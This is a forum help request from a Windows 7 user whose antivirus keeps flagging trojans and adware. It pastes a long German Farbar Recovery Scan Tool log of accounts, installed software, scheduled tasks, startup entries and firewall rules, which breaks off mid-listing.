Log analysis and evaluation: Malware-gen, Adware-gen ... etc. (Windows 7)

If you have caught a trojan or keep getting virus warnings, you can post the logs of our diagnostic tools here for evaluation by our experts. To be able to remove viruses and trojans, the infected system must first be examined: First steps to getting help. Note that an infected system is not trustworthy and should not be used until the malware has been completely removed.
20.09.2015, 19:10 | #1 |
Malware-gen, Adware-gen ... etc.

Good evening everyone,

Yesterday I tried to download some software and apparently stepped right into the cow shit in the process. My computer is running stably so far... well, it has seemed somewhat slower to me for a few weeks now, and it has not gotten any worse yet. AVG keeps detecting 20 different trojans, malware, etc. ... After I let MBAM run through, there was no improvement in sight either; AVG again detects 20 different things and blocks them successfully... for a while.

Thank you in advance for your help.

AVG log Code:
Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:15-09-2015 durchgeführt von Kenny G (2015-09-20 19:35:12) Gestartet von C:\Users\Kenny G\Downloads Windows 7 Ultimate (X64) (2013-10-01 16:18:55) Start-Modus: Normal ========================================================== ==================== Konten: ============================= Administrator (S-1-5-21-682121585-3582832733-1082443493-500 - Administrator - Disabled) eLoot (S-1-5-21-682121585-3582832733-1082443493-1008 - Administrator - Enabled) => C:\Users\eLoot Gast (S-1-5-21-682121585-3582832733-1082443493-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-682121585-3582832733-1082443493-1002 - Limited - Enabled) Kenny G (S-1-5-21-682121585-3582832733-1082443493-1000 - Administrator - Enabled) => C:\Users\Kenny G Tabea Studium (S-1-5-21-682121585-3582832733-1082443493-1009 - Limited - Enabled) => C:\Users\Tabea Studium UpdatusUser (S-1-5-21-682121585-3582832733-1082443493-1007 - Limited - Enabled) => C:\Users\UpdatusUser ==================== Sicherheits-Center ======================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.) ==================== Installierte Programme ====================== (Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.) 
888poker (HKLM-x32\...\888poker) (Version: - ) aborange Crypter - Deinstallation (HKLM-x32\...\aborange Crypter_is1) (Version: 3.10 - Mathias Gerlach [aborange.de]) Adobe Flash Player 18 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 18.0.0.232 - Adobe Systems Incorporated) Adobe Flash Player 18 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 18.0.0.232 - Adobe Systems Incorporated) Adobe Flash Player 18 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 18.0.0.232 - Adobe Systems Incorporated) Adobe Reader XI (11.0.12) - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AB0000000001}) (Version: 11.0.12 - Adobe Systems Incorporated) Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.) Apple Mobile Device Support (HKLM\...\{2EF5D87E-B7BD-458F-8428-E4D0B8B4E65C}) (Version: 7.0.0.117 - Apple Inc.) Auslogics DiskDefrag (HKLM-x32\...\{DF6A13C0-77DF-41FE-BD05-6D5201EB0CE7}_is1) (Version: 4.4.2.0 - Auslogics Labs Pty Ltd) AVG 2015 (HKLM\...\AVG) (Version: 2015.0.6140 - AVG Technologies) AVG 2015 (Version: 15.0.4419 - AVG Technologies) Hidden AVG 2015 (Version: 15.0.6140 - AVG Technologies) Hidden AVG Web TuneUp (HKLM-x32\...\AVG Web TuneUp) (Version: 4.1.6.294 - AVG Technologies) Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment) Battlefield: Bad Company 2 (HKLM-x32\...\Steam App 24960) (Version: - DICE) Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.) CCleaner (HKLM\...\CCleaner) (Version: 4.06 - Piriform) CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.5.5571 - CDBurnerXP) Cliqz (HKLM-x32\...\{5A0C0737-6AFE-4DC6-A8B4-6DFE509ACD75}_is1) (Version: 0.5.31 - Cliqz.com) Counter-Strike (HKLM-x32\...\Steam App 10) (Version: - Valve) Counter-Strike: Source (HKLM-x32\...\Steam App 240) (Version: - Valve) CyberGhost 5 (HKLM\...\CyberGhost 5_is1) (Version: - CyberGhost S.R.L.) 
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.1.0.0074 - Disc Soft Ltd) Free Alarm Clock 3.1.0 (HKLM-x32\...\{8ED5A2F1-338F-4608-8AF7-BCD1ADC1E1F7}_is1) (Version: 3.1 - Comfort Software Group) Free YouTube Download version 3.2.61.805 (HKLM-x32\...\Free YouTube Download_is1) (Version: 3.2.61.805 - DVDVideoSoft Ltd.) Free YouTube to MP3 Converter version 3.12.61.805 (HKLM-x32\...\Free YouTube to MP3 Converter_is1) (Version: 3.12.61.805 - DVDVideoSoft Ltd.) GIMP 2.8.10 (HKLM\...\GIMP-2_is1) (Version: 2.8.10 - The GIMP Team) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 45.0.2454.93 - Google Inc.) Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden Google Update Helper (x32 Version: 1.3.28.15 - Google Inc.) Hidden Hearthstone (HKLM-x32\...\Hearthstone) (Version: - Blizzard Entertainment) ICQ 8.2 (build 6901) (HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\ICQ) (Version: 8.2.6901.0 - ICQ) iTunes (HKLM\...\{A535111D-95C8-487F-869E-CE4C239972D2}) (Version: 11.1.1.11 - Apple Inc.) 
Java 7 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217021FF}) (Version: 7.0.450 - Oracle) JetBoost (HKLM-x32\...\JetBoost_is1) (Version: 2.0.0 - BlueSprig) League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games ) League of Legends (x32 Version: 3.0.1 - Riot Games ) Hidden LibreOffice 4.2.2.1 (HKLM-x32\...\{0ECDB550-79ED-4E9E-851B-19A8B2B4EBFA}) (Version: 4.2.2.1 - The Document Foundation) Malwarebytes Anti-Malware Version 2.1.8.1057 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.8.1057 - Malwarebytes Corporation) Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Client Profile DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Client Profile DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Extended DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Extended DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40728.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) 
(Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation) Mozilla Firefox 40.0.3 (x86 de) (HKLM-x32\...\Mozilla Firefox 40.0.3 (x86 de)) (Version: 40.0.3 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 40.0.3.5716 - Mozilla) Mozilla Thunderbird 24.6.0 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 24.6.0 (x86 de)) (Version: 24.6.0 - Mozilla) Native Instruments Audio 2 DJ Driver (HKLM-x32\...\Native Instruments Audio 2 DJ Driver) (Version: - Native Instruments) Native Instruments Audio 4 DJ Driver (HKLM-x32\...\Native Instruments Audio 4 DJ Driver) (Version: - Native Instruments) Native Instruments Audio 8 DJ Driver (HKLM-x32\...\Native Instruments Audio 8 DJ Driver) (Version: - Native Instruments) Native Instruments Controller Editor (HKLM-x32\...\Native Instruments Controller Editor) (Version: 1.8.2.281 - Native Instruments) Native 
Instruments Service Center (HKLM-x32\...\Native Instruments Service Center) (Version: 2.6.0.137 - Native Instruments) Native Instruments Traktor (HKLM-x32\...\Native Instruments Traktor) (Version: - Native Instruments) Native Instruments Traktor 2 (HKLM-x32\...\Native Instruments Traktor 2) (Version: 2.9.0.1257 - Native Instruments) Native Instruments Traktor Audio 2 Driver (HKLM-x32\...\Native Instruments Traktor Audio 2 Driver) (Version: - Native Instruments) Native Instruments Traktor Audio 2 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Audio 2 MK2 Driver) (Version: - Native Instruments) Native Instruments Traktor Audio 6 Driver (HKLM-x32\...\Native Instruments Traktor Audio 6 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol D2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol D2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol F1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol F1 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S2 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S2 MK2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S4 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S4 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S4 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S4 MK2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S8 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S8 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol X1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol X1 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol X1 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol X1 MK2 Driver) (Version: - Native Instruments) Native 
Instruments Traktor Kontrol Z1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol Z1 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol Z2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol Z2 Driver) (Version: - Native Instruments) NVIDIA 3D Vision Controller-Treiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 331.65 - NVIDIA Corporation) NVIDIA 3D Vision Treiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 331.65 - NVIDIA Corporation) NVIDIA Grafiktreiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 331.65 - NVIDIA Corporation) NVIDIA PhysX-Systemsoftware 9.13.0725 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.0725 - NVIDIA Corporation) NVIDIA Virtual Audio 1.2.9 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_VirtualAudio.Driver) (Version: 1.2.9 - NVIDIA Corporation) Opera Stable 32.0.1948.25 (HKLM-x32\...\Opera 32.0.1948.25) (Version: 32.0.1948.25 - Opera Software) Pidgin (HKLM-x32\...\Pidgin) (Version: 2.10.7 - ) pidgin-otr 4.0.0-1 (HKLM-x32\...\pidgin-otr) (Version: 4.0.0-1 - Cypherpunks CA) Poker 770 (HKLM-x32\...\Poker 770) (Version: - ) PokerStars.eu (HKLM-x32\...\PokerStars.eu) (Version: - PokerStars.eu) Project 64 version 2.1.0.1 (HKLM-x32\...\Project 64_is1) (Version: 2.1.0.1 - ) SHIELD Streaming (Version: 1.6.34 - NVIDIA Corporation) Hidden Skype™ 6.11 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.11.102 - Skype Technologies S.A.) 
SleepTimer Ultimate 1.2 (HKLM-x32\...\{0EE56463-49B2-45E1-B74F-3E0139DBC986}_is1) (Version: - Christian Handorf) Sony Mobile Update Engine (HKLM-x32\...\Update Engine) (Version: 2.13.13.201311261136 - Sony Mobile Communications AB) Sony PC Companion 2.10.188 (HKLM-x32\...\{F09EF8F2-0976-42C1-8D9D-8DF78337C6E3}) (Version: 2.10.188 - Sony) Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation) TAP-Windows 9.9.2 (HKLM\...\TAP-Windows) (Version: 9.9.2 - ) TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH) TrackMania United (HKLM-x32\...\Steam App 7200) (Version: - Nadeo) Trojan Remover 6.9.3 (HKLM-x32\...\Trojan Remover_is1) (Version: 6.9.3 - Simply Super Software) TrueCrypt (HKLM-x32\...\TrueCrypt) (Version: 7.1a - TrueCrypt Foundation) Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies) Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.) 
VLC media player 2.1.0 (HKLM-x32\...\VLC media player) (Version: 2.1.0 - VideoLAN) VNC Viewer 5.1.0 (HKLM\...\{8F29CFF4-4A54-4C34-8905-B74527DE93C8}) (Version: 5.1.0 - RealVNC Ltd) Web Companion (HKLM-x32\...\{99640eec-4d74-4df5-95f4-719dc27de6a8}) (Version: 2.0.1025.2130 - Lavasoft) Webocton - Scriptly 0.8.95.6 (HKLM-x32\...\Webocton - Scriptly_is1) (Version: 0.8.95.6 - Webocton) William Hill Poker (HKLM-x32\...\William Hill Poker) (Version: - ) WinRAR 5.01 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH) World of Warcraft (HKLM-x32\...\World of Warcraft) (Version: - Blizzard Entertainment) Wuala (HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Wuala) (Version: 1.0.444.0 - LaCie) Wuala CBFS (HKLM-x32\...\Wuala CBFS) (Version: 3.2.107.0 - LaCie) Wuala OverlayIcons (HKLM-x32\...\Wuala OverlayIcons) (Version: 1.0.0.2 - LaCie) Xilisoft iPhone Magic (HKLM-x32\...\Xilisoft iPhone Magic) (Version: 5.7.5.20150727 - Xilisoft) ==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ==================== Wiederherstellungspunkte ========================= Wiederherstellungspunkte konnten nicht aufgelistet werden Überprüfen Sie den "winmgmt" Dienst oder reparieren Sie den WMI. ==================== Hosts Inhalt: =============================== (Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.) 2009-07-14 04:34 - 2009-06-10 23:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts ==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) 
Task: {0D1A705F-BC57-4C56-9001-41F179ED8A24} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2013-09-19] (Piriform Ltd) Task: {2C62D752-B42F-4EBB-9A9B-8F3648694368} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_18_0_0_232_pepper.exe [2015-08-13] (Adobe Systems Incorporated) Task: {2D33A450-57FF-4A00-AE28-E87E56431EBE} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated) Task: {4E8F7D37-0852-4EDC-861C-E3D03ECBABA7} - System32\Tasks\Opera scheduled Autoupdate 1438940281 => C:\Program Files (x86)\Opera\launcher.exe [2015-09-11] (Opera Software) Task: {69CAC2C9-9E20-47E3-9AAC-5005640B912E} - System32\Tasks\GoogleUpdateTaskMachineCore1d0925912504720 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {6D06CB31-009E-45FA-A9FE-85EEEF758F7C} - System32\Tasks\Adobe Reader and Acrobat Manager => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated) Task: {6D47D039-18B5-44B4-8059-2A192F7A2F7E} - System32\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {80ACD03E-D8E8-47EB-B041-F165F30E230D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) 
Task: {9200AA28-5EB6-4EAD-BF4E-CDF0410B5CF9} - System32\Tasks\{A3BB51D3-1E67-46C5-8ED5-8734DECD6918} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&ver=5.3.0.111.261&LastError=404 Task: {A23C2641-27E1-4303-8187-0DBF0233649C} - System32\Tasks\JetBoost_AutoUpdate => C:\Program Files (x86)\BlueSprig\JetBoost\AutoUpdate.exe [2012-11-27] (BlueSprig) Task: {B304FCBA-F8AD-455F-95F7-BBA64D8987AB} - System32\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {B4A8F9FA-04C0-40CF-95EB-AE47E2BB4073} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe Task: {C1019F60-C40C-40F9-99E0-A20254841B65} - System32\Tasks\{AFE2C666-2C4F-49BB-B86B-2CC7B241F441} => pcalua.exe -a "C:\Users\Kenny G\Desktop\bewerbung\bitdefender_isecurity.exe" -d "C:\Users\Kenny G\Desktop\bewerbung" Task: {C4EDDEAE-BCF6-49B9-A64D-CACA20F51E9E} - System32\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {C7A41BF4-00C0-4FC0-A9C1-22B5B9F7ACC5} - System32\Tasks\{7AD56248-245F-4D20-B2FB-3A38DD4D9679} => pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{0FBD9ABF-7DA0-463E-A7DC-A394052CC9A8}\Setup.exe" -c -runfromtemp -l0x0407 -removeonly Task: {CB8F7966-49EF-42D7-B59C-81E070B86191} - System32\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {EFCA144A-E45A-4877-8FAD-E51248235D56} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.) 
Task: C:\Windows\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_18_0_0_232_pepper.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d0925912504720.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe ==================== Geladene Module (Nicht auf der Ausnahmeliste) ============== 2015-06-02 09:01 - 2015-08-26 11:33 - 01205136 _____ () C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe 2013-11-03 19:09 - 2013-10-23 10:20 - 00102176 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll 2014-01-15 20:58 - 2014-01-15 21:16 - 00076888 _____ () C:\Windows\SysWOW64\PnkBstrA.exe 2015-09-19 11:34 - 2015-09-19 11:34 - 01610240 _____ () C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs 2013-09-13 19:51 - 2013-09-13 19:51 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll 2013-09-13 19:51 - 2013-09-13 19:51 - 01242952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll ==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.) 
AlternateDataStreams: C:\ProgramData\TEMP:373E1720 AlternateDataStreams: C:\Users\eLoot\Downloads\Photoshop_Portable_12.1_Multilingual.exe:BDU AlternateDataStreams: C:\Users\eLoot\Downloads\Photoshop_Portable_13.1.2_x64_Multilingual.exe:BDU AlternateDataStreams: C:\Users\eLoot\Downloads\torbrowser-install-3.5.2_de.exe:BDU AlternateDataStreams: C:\Users\Kenny G\Downloads\HiJackThis204.exe:BDU AlternateDataStreams: C:\Users\Kenny G\Downloads\jetboost-setup-2.0.0.exe:BDU AlternateDataStreams: C:\Users\Kenny G\Downloads\SetupCasino_aad73b_de.exe:BDU AlternateDataStreams: C:\Users\Kenny G\Downloads\SetupPoker_5fabb7.exe:BDU AlternateDataStreams: C:\Users\Kenny G\Downloads\TitanBSetup_5c0cd5.exe:BDU AlternateDataStreams: C:\Users\Tabea Studium\Downloads\Shockwave_Installer_Slim.exe:BDU ==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.) ==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.) ==================== Internet Explorer Vertrauenswürdig/Eingeschränkt =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.) IE trusted site: HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\localhost -> localhost IE trusted site: HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\webcompanion.com -> hxxp://webcompanion.com ==================== Andere Bereiche ============================ (Aktuell gibt es keinen automatisierten Fix für diesen Bereich.) 
HKU\S-1-5-21-682121585-3582832733-1082443493-1000\Control Panel\Desktop\\Wallpaper -> DNS Servers: 192.168.2.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall ist aktiviert. ==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge == (Aktuell gibt es keinen automatisierten Fix für diesen Bereich.) MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk => C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup MSCONFIG\startupfolder: C:^Users^Kenny G^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Dropbox.lnk => C:\Windows\pss\Dropbox.lnk.Startup MSCONFIG\startupfolder: C:^Users^Kenny G^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^MyPC Backup.lnk => C:\Windows\pss\MyPC Backup.lnk.Startup MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" MSCONFIG\startupreg: Bdagent => "C:\Program Files\Bitdefender\Bitdefender 2015\bdagent.exe" MSCONFIG\startupreg: Bitdefender-Geldbörse => MSCONFIG\startupreg: Bitdefender-Geldbörse-Anwendungs-Agent => MSCONFIG\startupreg: CyberGhost => "C:\Program Files\CyberGhost 5\CyberGhost.exe" /autostart /min MSCONFIG\startupreg: FreeAC => C:\Program Files (x86)\FreeAlarmClock\FreeAlarmClock.exe -autorun MSCONFIG\startupreg: GoogleChromeAutoLaunch_9CD6D292798361639A68D2D1D9501714 => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window MSCONFIG\startupreg: icq => C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe -CU MSCONFIG\startupreg: InstallerLauncher => "C:\Program Files\Common Files\Bitdefender\SetupInformation\{6F57816A-791A-4159-A75F-CFD0C7EA4FBF}\setuplauncher.exe" /run:"C:\Program Files\Common Files\Bitdefender\SetupInformation\{6F57816A-791A-4159-A75F-CFD0C7EA4FBF}\Installer.exe" MSCONFIG\startupreg: iTunesHelper => "C:\Program Files 
(x86)\iTunes\iTunesHelper.exe" MSCONFIG\startupreg: mobilegeni daemon => C:\Program Files (x86)\Mobogenie\DaemonProcess.exe MSCONFIG\startupreg: Optimizer Pro => C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exe MSCONFIG\startupreg: Sony PC Companion => "C:\Program Files (x86)\Sony\Sony PC Companion\PCCompanion.exe" /Background MSCONFIG\startupreg: Steam => "C:\Program Files (x86)\Steam\Steam.exe" -silent MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" MSCONFIG\startupreg: vProt => "C:\Program Files (x86)\AVG Web TuneUp\vprot.exe" ==================== Firewall Regeln (Nicht auf der Ausnahmeliste) =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) FirewallRules: [{F1E8D03D-FFA2-42DD-A766-22ABE0AD0436}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe FirewallRules: [{A0A07BA7-2135-482B-8CF0-7D59DA237E7B}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe FirewallRules: [{15629829-3DD3-4A81-B20D-4255F55023B9}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{51D8DA04-F385-4088-8779-22A2C6969D59}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{1CD2F4D1-8114-4FBA-9D7E-4BFC8959B015}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{1B40452A-2002-47A8-B02E-49C07A677A04}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{B6489A7B-4235-4D96-99A9-EEDD6A2FE8BD}] => (Allow) C:\Program Files 